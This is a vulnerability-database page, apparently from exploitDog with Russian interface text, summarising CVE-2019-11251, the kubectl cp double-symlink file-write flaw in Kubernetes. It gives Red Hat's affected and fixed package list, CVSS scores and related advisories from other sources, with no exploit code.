Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2019-11251

Опубликовано: 18 сент. 2019
Источник: redhat
CVSS3: 5.3

Описание

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.

Отчет

This issue did not affect the version of Kubernetes(embedded in heketi) shipped with Red Hat Gluster Storage 3 as it does not include the symlink support for kubectl cp.

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat OpenShift Container Platform 3.10atomic-openshiftAffected
Red Hat Storage 3heketiNot affected
Red Hat OpenShift Container Platform 3.11atomic-openshiftFixedRHSA-2019:390518.11.2019
Red Hat OpenShift Container Platform 3.9atomic-openshiftFixedRHSA-2019:381107.11.2019
Red Hat OpenShift Container Platform 4.1openshiftFixedRHSA-2019:326630.10.2019
Red Hat OpenShift Container Platform 4.1openshift4/ose-cliFixedRHSA-2019:326730.10.2019

Показывать по

Ссылки на источники

Дополнительная информация

Статус:

Moderate
Дефект:
CWE-59
https://bugzilla.redhat.com/show_bug.cgi?id=1753495kubernetes: `kubectl cp` allows for arbitrary file write via double symlinks

5.3 Medium

CVSS3

Связанные уязвимости

ubuntu логотип

CVE-2019-11251

CVSS3: 4.8
ubuntu
больше 5 лет назад

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.

nvd логотип

CVE-2019-11251

CVSS3: 4.8
nvd
больше 5 лет назад

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.

debian логотип

CVE-2019-11251

CVSS3: 4.8
debian
больше 5 лет назад

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions p ...

github логотип

GHSA-6qfg-8799-r575

CVSS3: 5.7
github
около 4 лет назад

Kubernetes kubectl cp Vulnerable to Symlink Attack

fstec логотип

BDU:2020-04880

CVSS3: 5.7
fstec
почти 6 лет назад

Уязвимость команды kubectl cp программного средства управления кластерами виртуальных машин Kubernetes, позволяющая нарушителю загрузить вредоносный файл

5.3 Medium

CVSS3